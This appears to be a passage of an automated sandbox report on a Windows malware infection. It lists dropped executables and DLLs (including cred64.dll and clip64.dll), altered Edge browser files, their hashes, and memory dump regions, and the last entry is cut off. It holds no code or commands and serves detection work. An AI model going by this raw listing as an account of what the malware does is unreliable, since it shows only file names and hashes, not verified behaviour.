SHA512 142ca76bc32cc60c11f640bd9e050df6000b6824a192595416f661d22d6e52704dfd369974d7f2f73d01eaa356237c50778737d72d5588c5a2ff8a8010ee8101

C:\Users\Admin\AppData\Local\Temp\kos4.exe

MD5 01707599b37b1216e43e84ae1f0d8c03
SHA1 521fe10ac55a1f89eba7b8e82e49407b02b0dcb2
SHA256 cc0dbc1d31ccd9488695b690bd7e7aa4a90ba4b2a5d23ef48b296465f5aa44dd
SHA512 9f9ff29a12d26a7d42656e0faf970c908f1ef428b14e5a5fe7acd06371b96b16eb984e8fbee4e2b906c6db7fb39c9d4a221e79fc3d5e9ca9b59e377875bc5642

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 f81143e6122b3f1d373a7812bd3be699
SHA1 2e59ee70a86f379c8b0ea1c7923d9b72e84fea71
SHA256 0d070747d4af1411962900ea3608538927d124e31b26246fc5b0187c5214610f
SHA512 3ee5f7835118df27afa6e983f494e1bef2667c95f96415f02731f8c2340a17a1e6f738791772c82d8ce3fd1d29a31a7285926744c97bca9a143ce09a29a95d63

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 4656e4e044b98073b211444b6665aebd
SHA1 724a25faa5401ef2e0d0127ddf9b9fc47f4390dd
SHA256 87e8f68de4a20aec4bfcd67bf12ec8bc5d5be2d5ef8b1741df460dd00576d0f8
SHA512 088504e0dc6d89a997f3888815d71874097b96f7ea578c7ad3d87b33caba328b0316f45e34a3350d31d5766ce30ece133602a6b4f6787e678bd190df844c973f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe580422.TMP

MD5 11009ae0f3736318be281fdbdfbd7f22
SHA1 ae4a08b02935474f44b66eff6302502016dc3521
SHA256 64ebadfdb3369502c7072494b2f7861c5bc4ea04977639891840df76290bb61c
SHA512 2ff75582c3efac3c099989789c9b5c7ae69feb74b8399f7a34ca3818cce85b3b6b66ac4ea029bf74131d7cd588b3ab58b8d5d9ab1b413b5e6580c064102bf386

memory/3152-1113-0x00000000076D0000-0x00000000076E0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/7660-1145-0x00007FFB2E210000-0x00007FFB2ECD1000-memory.dmp

memory/7660-1139-0x0000000000790000-0x0000000000798000-memory.dmp

memory/7660-1146-0x0000000002820000-0x0000000002830000-memory.dmp

memory/7740-1169-0x0000000074A10000-0x00000000751C0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 bc49f175d6e823a080ff905145481c9f
SHA1 4765bb9c93ef31a06b7e5da1693f68190350950b
SHA256 945eddae049282832afc3cd1cecd0edbbbe548e93753b45101cf5f4ba45adb5e
SHA512 4917cf92f0a4302f5a27a2b0fba9ba9a7f572d4f83fd6e65322b5ac720db4001f3f544c5b0744b0856141d72fd1848d5cde7fcd8a998c78300aebf165c273a44

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000022

MD5 9f1c899a371951195b4dedabf8fc4588
SHA1 7abeeee04287a2633f5d2fa32d09c4c12e76051b
SHA256 ba60b39bc10f6abd7f7a3a2a9bae5c83a0a6f7787e60115d0e8b4e17578c35f7
SHA512 86e75284beaff4727fae0a46bd8c3a8b4a7c95eceaf45845d5c3c2806139d739c983205b9163e515f6158aa7c3c901554109c92a7acc2c0077b1d22c003dba54

memory/7312-1245-0x0000000074A10000-0x00000000751C0000-memory.dmp

memory/7312-1246-0x0000000000840000-0x0000000000C20000-memory.dmp

memory/7312-1250-0x00000000054A0000-0x000000000553C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000021

MD5 16d0a8bcbd4c95dd1a301f5477baf331
SHA1 fc87546d0b2729d0120ce7bb53884d0f03651765
SHA256 70c40438ca2493e0bb5717ebcaf4c8f3cb670761463c3d8dd84646ee65e5cd3f
SHA512 b554386babd36aae3e7dc6b2926e42176c21cafcf4406e4f71b94bd6bc1c3cc26dba0c4f5a1af3c94e2b623b3c783101f5a28f9dee35468ed217aa36496e275c

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 dee3aaee8b5da408f70a490ee6e4b8d8
SHA1 3f752a1e6e233c855507c7536bda39d7c79f211e
SHA256 7450d1598c62e104039054ee3676970f182942be66da125089383989058fbbdb
SHA512 770ab7f61acc8f9fec9536245c7ad1156b1b7ee9a6c1a4a2c1573a8c6f7cb6932f220e82b0b3428111dcbd858286f291b22e3cd433d71fbf572e60eee91d37cc

memory/7796-1289-0x0000000000400000-0x0000000000418000-memory.dmp

memory/7660-1335-0x00007FFB2E210000-0x00007FFB2ECD1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d864f8c3fadc14b8d46678a020726fc8
SHA1 154e1e80d1a85cc3eece7cf270a2eb08f8c9441d
SHA256 2f4efe05365e0e99861b62f05749e5ee7ab55cd8eb18dcd0a6843c20c8f7d584
SHA512 cbb7d6001b6a60295714f1722a4675c738f5624cd465a7863cb8a82e861969dade48f495ce552a78eebdf9379528d118f0e9ccb3b4c540550c0ad54d9c625a63

memory/7944-1359-0x00000000009A0000-0x0000000000AA0000-memory.dmp

memory/7944-1362-0x0000000000800000-0x0000000000809000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002e

MD5 bceb0378c3089b39ab86bdea6cd0ca3b
SHA1 f0eff49f445b4186e8f3c45e0111d91655f00e6b
SHA256 70ec4829127eb434e7391065ebe48b74ea072cfa4a27b7267369422a0de459d7
SHA512 64e8be49fac5a4857769e4ec0fac28f31d10075b58c86039bb6b6d2e9b4ddd1c4c7a3385717e450d8c19ceef3ce323b6c5ed1f4f6cdbb61ace01a61f102f76a9

memory/8524-1386-0x0000000000400000-0x0000000000409000-memory.dmp

memory/8432-1397-0x0000000000610000-0x0000000000611000-memory.dmp

memory/4128-1399-0x0000000000400000-0x0000000000461000-memory.dmp

memory/4128-1400-0x00000000001C0000-0x00000000001FE000-memory.dmp

memory/3916-1410-0x0000000002940000-0x0000000002D43000-memory.dmp

memory/3916-1411-0x0000000002E50000-0x000000000373B000-memory.dmp

memory/8524-1367-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3916-1446-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/8692-1443-0x00000000007A0000-0x00000000007BE000-memory.dmp

memory/4128-1448-0x0000000074A10000-0x00000000751C0000-memory.dmp

memory/9032-1450-0x0000000000400000-0x0000000000612000-memory.dmp

memory/9032-1452-0x0000000000400000-0x0000000000612000-memory.dmp

memory/9032-1449-0x0000000000400000-0x0000000000612000-memory.dmp

memory/8692-1455-0x0000000074A10000-0x00000000751C0000-memory.dmp

memory/8692-1457-0x0000000004F30000-0x0000000004F40000-memory.dmp

memory/4128-1458-0x00000000076F0000-0x0000000007700000-memory.dmp

memory/9148-1461-0x0000000000400000-0x0000000000612000-memory.dmp

memory/7312-1454-0x0000000074A10000-0x00000000751C0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 233b67a4d39fa9120baa357e36cc5667
SHA1 db1fc1e36891674e59e43b8a613749d9ef539ac5
SHA256 8bfebb8b83d711bea5eddc0aa66a101486fe0f87f69f8f5997301b0d265e6a25
SHA512 9101b05cb8d8a408460b5d251ac4fc9e5387a26fb2ecc7a58154461174c985c9e5cac6ed990ea15ae2fdb28b00b6f1ec22e63320ae51665feaff03887bee1729

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe582c5a.TMP

MD5 b2c19e0e25079915a95d7e78054eddb8
SHA1 76880c8e2d87a818997ae87a291602599ef287f3
SHA256 f46db51b89a6d12213b3f3a154bfcbebe8a1ecec909cf18821407d4121404b42
SHA512 092c2eaa602bbddb138a5ad0c2464d43f036fa9a196dfa579a68dd356cfe304bf4213ad039e8910b7fdbc77b5e04f9a6bd4843731d51a66e89031b4fc0fcaa46

memory/7796-1530-0x0000000000400000-0x0000000000418000-memory.dmp

memory/8412-1539-0x00000000025E0000-0x0000000002616000-memory.dmp

memory/8412-1541-0x0000000005300000-0x0000000005928000-memory.dmp

memory/8524-1545-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3136-1542-0x0000000002AD0000-0x0000000002AE6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1hzkrpes.2tv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/8936-1592-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 272a470253896a5a70148d49f6d6ada1
SHA1 12bed958d817c5473e7fd80eb1f334cfa68f4c4d
SHA256 d3302e1cb37a8cbc0c559cf9d5438b24fa2872e6fcb7e251b502de7eefc133eb
SHA512 3119f63261259b28210552c9388f2e2b5f7280816aa403d8d9bdf243e0f7a02ad01932f33e1d3e3e70d6b35e62fce49212e5992844ea1a15fb2186a278a3baf5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 7bd8fd9957fbe8ed33eea3f664dd41ff
SHA1 0267a4f5a8d3e38cd7081704b62a51ce86867147
SHA256 2e4af11ca5c5bc75f43bf15d1d0ef049438e51f855472c711ae7e403d9bcb9ec
SHA512 39a78b978c6445e0a3f36890d2718570cfd61f0904ba1c130c3ee73f833cf6c53ab638c5f562bb9642cb66f0b8aeadb537e73a2d4c573f6771efb757f5b69b06

memory/8936-1597-0x0000000000400000-0x000000000041B000-memory.dmp

memory/8936-1595-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

C:\Users\Admin\AppData\Local\Temp\tmp5826.tmp

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\tmp583B.tmp

MD5 2ea428873b09b0b3d94fd89ad2883b02
SHA1 a767ea985e9a1ff148b90a66297589198b2ed2a0
SHA256 0c89f9ffb4f2f7955337b3d94f7712ea0efc71426545018c673caa84a296efba
SHA512 3a642989b1701f352d4e4167aceaf8f2f536882f2018d80d3d7be4770bda1524a5264e25ab995b87a67b8ea4fb87736641d22264c0d4ba71c550e4ce3bbf3d3a

C:\Users\Admin\AppData\Local\Temp\tmp589B.tmp

MD5 dd85f7c33d9db419ff12ae8f69c3103a
SHA1 ace95ca9002b99e7ddd4d81668e5300515bea9e4
SHA256 cbe851c8f8919207eb95ecc0699bc55d97d80551ecd5660719a162dd141cbcc6
SHA512 09e32eb60f1ca15d9747bf3000f4296e47785bfa4c12ea9e4fa82535bc271cf8bb263a3dd8b5b897b6b43d7fcf02e1ec26c5e0bb049ccc45560389bb80972fdd

C:\Users\Admin\AppData\Local\Temp\tmp5886.tmp

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Local\Temp\tmp58DC.tmp

MD5 71ac82309bfa6b58c48ebc8f288491a2
SHA1 79431ede2a8e52b038cc877ea4f37a16a21ab2f1
SHA256 9fb1de75a09316f8714f89e1e1c8b8472a85038e2ec269834f2f69f93c09d695
SHA512 0be0115157ad3d257cd0b3f8ba12432e3ddb35f7345d2b8475a3465aac6d7ade3783672e4dc7eb6e68b88cdbc161849503c9a25f17b15575740798011692ebd2

C:\Users\Admin\AppData\Local\Temp\tmp5907.tmp

MD5 d367ddfda80fdcf578726bc3b0bc3e3c
SHA1 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671
SHA256 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0
SHA512 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 832ff1a43030018f7d08162a1263003d
SHA1 09ef08dd2f932fa35c047c341604d0d3e20ba075
SHA256 f5f566e13c42fafc7c45fa8259131d00df1681f8f71b0f80c9dc26e2479165a3
SHA512 5ea372c8e27a3161cfa292d3e9fc7e6fedd7c06d18ec2ea5919e3b010f403af6b9c0882bc0d089383dc0a214c01adffa342d021ff1591bd8edaf8aba8efca616

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe585acd.TMP

MD5 c632640520c4538f7387afa854374de3
SHA1 44e44581fb89555b27dc8e1a85867822a124a544
SHA256 ff43099b4a864d798a1e5958ad3e6e075b6a4efa2ae65b65afa36454427b2388
SHA512 4327e73224ff5fdf772a102b80b9caf984a6b6546312931a6a91271db3b72d8a9b5664c37d1077a2ca22a2ced7fe5883b3ebd6282e007585f9808999517f71b7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\d138b3cd-8459-4142-9d9e-940aa63cc63a\index-dir\the-real-index

MD5 8b769039b297fea9f0ddb2ebaba550d8
SHA1 7c2bfb2175c916b6f694dd1e449c659b8ff24557
SHA256 8f456ee60f9b7348a7bb539908c9e16b4ef0c84deececeda888d657bd9c14840
SHA512 42c2336232ce5901d5b86fa56abb77f9d567bb4219f3a655cbc52e23dee785aa5b89e0b4332148400e13f2f94218c1993226d9bcf74e33d3eb460cf12be72fae

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\d138b3cd-8459-4142-9d9e-940aa63cc63a\index-dir\the-real-index~RFe586760.TMP

MD5 b9bcd6228685bcc6b57455b0aa82304f
SHA1 842ab6abb92a8c07b7ef04fc6d662928d667b27e
SHA256 4ad8bbc4590a41885b95f5ace83fe1ea658e6adb5d05014c350939548a3413ca
SHA512 452c3d921bacc44f6c90aebbc90e3ebaf120ab3a072e06bcd3fbdf78427cc9746e6a68b442d7d93708d3dce77e36a3e14344772c235d459f891df60345214dc1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 6ac7585a44d81d1029870d7a6f861925
SHA1 600c02f24d1717eed262be107f22e5ca9b2de802
SHA256 fe64a55bc2a09015516d3a96aef8dfdb3deafaafcd9775649df29c0643242279
SHA512 2db7468ce3cc027393cf5164a75d0d9f2b5de62fbf00a2593991ae763e80d8278bc1a2f55dd3457b10544a5678ddfd0d93a6edc75eab6fda257db68aabec622b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\363f3c8f-a4fd-42e9-a552-bc5e5d0d61e6\index-dir\the-real-index

MD5 bc730bf82a1a4e2990e1633c0bc5ba2b
SHA1 496c657dc93058fbdc1ae7030847375615a20e2e
SHA256 36c30fe2a7e99f2391fb911f5bbe21abd47aaef806eafbb1ea3a5127c6f36797
SHA512 e2e5c183868d16ead1e14cfde4ddb72e830f48b59df3fb78635fbaaa8178e7769de6107ab089f66e5163136c0572b877b89607a868a13e04e5ff26da6e7461b3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\363f3c8f-a4fd-42e9-a552-bc5e5d0d61e6\index-dir\the-real-index~RFe587d0b.TMP

MD5 2b26cd66cd6e24f14fb25687dce6417b
SHA1 5c918e197c743ba5e3f33b38259304daa1f0930c
SHA256 096f5f2999e14ab0a35aa83770a50fc9cbda1b8a979b36a8c83ddd1b6e8d4f18
SHA512 2110b932b6bd72cf97f07087552fcbf4b8fa05e257e38f6c16495c1a41d63a5d3c51956cf01feabc7d009bcf79be39b3d166555cdf173ee7000a9bc8bebab827

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 727d9fbc703a12bfd7f871f2fdea0cad
SHA1 f2459842d832f2cc53b57f409c8d421f54b2b139
SHA256 70ce886c88f093f6a77f2d0d8fee73e6ada57d3cda468f26f2ce3fb94a6dc499
SHA512 a0946cfb5725722a273bd9c99a3eafd4310c6fa358e6498e492684f4fef20283f052304eeb7160558ff296708785b669c39adb230e6525f92b4dc0f8c4716368

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000020

MD5 8eb5c41bcc41b26d2df786cf842497cd
SHA1 ed2167c2eb6906c0794f90a304ac870687c486b8
SHA256 52775f71c06824d4081692f9f4e47e02aa5a41694daef3b8f57e14a49933a77d
SHA512 77eae3cdd04da631414f861a08bc5e0279cdf745b6922fcd0ffe022c44585e0316a1e78d2cc86d1c21d6ab01e104cd959168a55e40e08a33d896a679c00b3771

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000026

MD5 d5b8d141a08fdde8abf6cd1d5343346a
SHA1 bdac6246a7ef746566b18033eef52ee4de95082f
SHA256 0ed2ba45aaff926c33f6a21b1edea31ae58932999d4e7594907c0f067baf8ec3
SHA512 fb3f2d0e09158e5758d33408bf366b1aee9973f6a549b434b67c4b5946afb59e702f3ad85dcec92308503db8c0e1b54ea6e2e22a7c24347289b8b98346c02fca

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00005c

MD5 b82ca47ee5d42100e589bdd94e57936e
SHA1 0dad0cd7d0472248b9b409b02122d13bab513b4c
SHA256 d3c59060e591b3839ec59cad150c0a38a2a2a6ba4cc4dc5530f68be54f14ef1d
SHA512 58840a773a3a6cb0913e6a542934daecaef9c0eeab626446a29a70cd6d063fdb012229ff2ccfa283e3c05bc2a91a7cac331293965264715bdb9020f162dc7383

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 816835a428c976c8f57c824b2eaf121e
SHA1 2fda0dbe0b9182768d1fdf2f2b97957a543bc301
SHA256 ddf01148360a0690fe55f0a7cd62c10f64892ed55724ac87b12505294d0428da
SHA512 0d746f1618e8857c7b80f9087ba15bf88d2b6b2a7199496eda559dcbc092cc5dac660f231e558e960cc00db17e10224179564712516c8e4595b2fb9022ff9d56

memory/2800-2127-0x00007FF72FEA0000-0x00007FF730441000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 237883333dcdae223543e499b4e0b028
SHA1 bc0295d29820afa66daafb52f736813998b1dde5
SHA256 8bd8f3704a6dd0144d9e43bc2ead9382ee955faa6ad6ff5d0ce36a77b9b80243
SHA512 71ee8ce3befd4ef3521e577a8712ae89d57be90393c8161c9272a54d2707836645311b02827e49f783c28fdbf3e845ffbc1b90ca15d86d8ebab8f16f7d964712

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\index.txt

MD5 e943154e4b3791dcf6e7c2d0d3d0ad24
SHA1 ca2cf2fab2b2551ecfdab0c7bf380e5f3c34e958
SHA256 fe3287dd4007e4683f0cbcd398f670936464d33a1b61628e7ecfb8bf59ee10c0
SHA512 2ae250d5d46084e69c811761cc4879e9599168c7ea8841d14fe6fefbc6825990a35e6234591aa578073a735517a46a3c73b90a1ac9a21c546dab77d761cff5d6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\index.txt~RFe58c0ea.TMP

MD5 e671c6787da7f9bcd93d061b9db6c5c6
SHA1 49cca4818177553c01d6d287fa7790bd14cd225c
SHA256 ee3f858732271f57d81b47973366c065f6a78d624526ba263f566e93e8eb9ca8
SHA512 0cab3d50e3f814900700372195996f0ca0ed43213549778ac6447f6fc08208d7ad20ed9a5cad6b2067efaf8725d3b8a3a47b67e617e8b37a1c4c389b5ba23c11

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\0f221d28-2146-4195-866c-1f0c6ef09ee7\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 11a374c186098b8efe2c90999ba5e989
SHA1 d11842055efcafeb22a0670e9d6d33188dd47ce0
SHA256 35914c4ea37671563eb0fbc968b8de43fd897d550a8cb64151299f875f542230
SHA512 a26ae188c67f658821127648108f4c427b0a0bb94374eb5fb313a77c23b46db7389ba56c2925b4c50e0d31d938338a5b1e5745857524d3c7c98f4c0cad91b8e6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000028

MD5 5c1f5b5423d642cbe35e227fe9876eaa
SHA1 30305673953a3687555d09f36ab6158dd3f06c8a
SHA256 02d9dc055ce694838aee2468fcd912c5bbb5b9fc5676c4179dafbed1119f0c44
SHA512 c52ce31bf7afc754e71cdcd3857f9acb5544efdf72751d968f15d77a5e8b5faef63fe16c3e78aff96dfe57a814aefe4cd507ad7632ca3c2030053c71f9107e94

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 d4f43f3b400cad42c13f8c5a87ddd738
SHA1 1ee469b87e0eeede733504d48eda388d0aab8216
SHA256 bcee297cb2ee1a65144ece680a7fe7dcfe34f2e88164cd1e60370f1c9266119e
SHA512 348ec1794519ecb1bf69d7fc5f1676d72397731c147ac518df086bb3c6fde9e4a2f83c3bb672f3a9c2c0f7a1aa983578326fb3775037fbe9f533e420e657023e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 ccb3c9d2e8b832aa9ba9f9cf6aad2c85
SHA1 1c53073c8a32fefb3ea25750830f49d4c63ef534
SHA256 9ea27119608dd3045c26f16b0d4eab17d4e7d679ae1e1681f778fb0ad667972f
SHA512 9f4f673754221c77bfbcc4030323f23e3c6de416044bf7c0994e690d5bf6f4c34ac24d3a4b0f5ab579d941e75986f2de2c0197760e5d23dcba6a1545d17262dc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 5ecff297a8e1d2282481b27b34cff9e5
SHA1 8bbffd18b8c0a001baa27499cac5c2d8d3ce2ac4
SHA256 536d31b149b94ab15f94e9634c8cc17eec8f57b6527f8528ebe02afdfb411875
SHA512 bf95d48adecaac8ff68b63a32e185c5b61afa18168b608b2b4132d7e3e87222591fff6d5616015f395d19a907af3cb71d8c88961d1de5efa67eb9f6eb8a8f0ef

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 8474d1e189dee1bfaa29ff24c8db694c
SHA1 bc23ee3bf853da7c767199a23d0391e8f6cfcdbc
SHA256 02c75d590e9c89992d39a9fb4ee3acb18b6165dd60a53ed59070dfd0531e9257
SHA512 1f6f9f17a13900b70a0a7375a3a51f02c76792e4595cae91ab24aee197d00bedb247f411dff9e3b0d87dc9ae9f927bd2482d256929b59132e234580516de4b3f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00005d

MD5 990324ce59f0281c7b36fb9889e8887f
SHA1 35abc926cbea649385d104b1fd2963055454bf27
SHA256 67bcedd3040fc55d968bbe21df05c02b731181541aff4ae72b9205300a4a3ecc
SHA512 31e83da1ac217d25be6e7f35a041881b926f731fff69db6f144e4fe99b696a31f9ab7766ca22cf5a482743c2a2d00a699ca2c2d67837a86c471a2dd3bed9ea1f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

MD5 603b46a042ff004fa5b18b5e64a7c121
SHA1 d5edc542e336e7c4ecd7279b1d5e5666c7b00a31
SHA256 077ce9cdd14688ea70f9a22a75c6f97416213cc8b869a0b1d4de476403e6b8be
SHA512 a22e853dce127dfe6c0ca5401ca488ea4cd37011a19e32557cf5c2438b75b97ac62c7b1adc1acfb67c6a47e39979cd5c778413ddf6246a46835c7a2f7c69066f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00004d

MD5 1490acc6c189316c545989694777347d
SHA1 40d46c9364bcad6fa1f9e5eeeca1120e3124e903
SHA256 fe349cee3e127dc9754839d36e462abdb47db388502b0fe5c0132252d3bea75f
SHA512 4e34822f615e7c4a105ed9e1de727cb28b1bd349a14f1dc53313b473c25a50bbffba66d757747d8d0b201ede64d89d73dc918be7cb87614592f5720629cd76ba

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

MD5 85122ab68ee0ec8f5b454edd14c86c41
SHA1 d1b1132e3054ff3cef157fea75f4502c34fa5e26
SHA256 4f5169675d35f59c99a0a4e41a52a0b79a86117a9244ac79dbb1e7cc13e0e9b5
SHA512 dae95ac0a262b0fc88302050c51158e11fd113c05efa351bee3213e75150181915a870e00ec0797ec994462ccd841c77215a7b7b0d02651d4757f03ba17274ca

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00005f

MD5 3d2f4182c474d87c9d1fecf7af9f7082
SHA1 213a499d3f304b2015efb399a0faf08bc78c4306
SHA256 c243f4ab8abf11750a75121292f499ff77213c6c56c0aed0730f3cdf084036d9
SHA512 c22ece464abfc073c7f417b571fd534bcfbbb953b89c10e878bc74b2de671fed0e667a1abee380cf14c49680d2d9ce1d5ee920dc676d05e37965ad3e6348d1d9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00005e

MD5 ab18a46f7c0b1a34b19d40d2198dbea0
SHA1 fe6fb562b7c2ce00e4fbefb140b0281631e03376
SHA256 27d2a2e22ff6476c72078311e9e1c58b1b72ec687f563b2d4f802f99e65afb12
SHA512 fdf94f4ad2923c1d4245279e1983e1e1ea3d6cc15793b9eedf79daf66ca44c5c4c78c04371b5a752906fe9c6975db36342f6e43ef457f28c67d3c81b8b9e8cab

memory/3188-2605-0x0000000000400000-0x00000000008DF000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000066

MD5 67412b247e0ff9363d571537acb61e09
SHA1 e58351674fb43e8fec92c7258ebe25703fc708ad
SHA256 663d61f95733059cd6879a8d5f2fdc8b0a1705a3fd25d0ed013ae8f09e215666
SHA512 b193da22ca7fe981cd8e30107fc5d9b3007b3b91310bea0d41d379bc36421e83396364b5bb78676a3fff2f6909773438889cac231c31eef1d13e62f1b32e59b7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00006b

MD5 e688630f33c2bb19a3dcc8638cc8add4
SHA1 d1c63d5727a4c00c4955dfb54bc7840c6dea3645
SHA256 81d1c12fa0fc944e0db257c8f9a23f603029532dc9226a8c416c64e56380db21
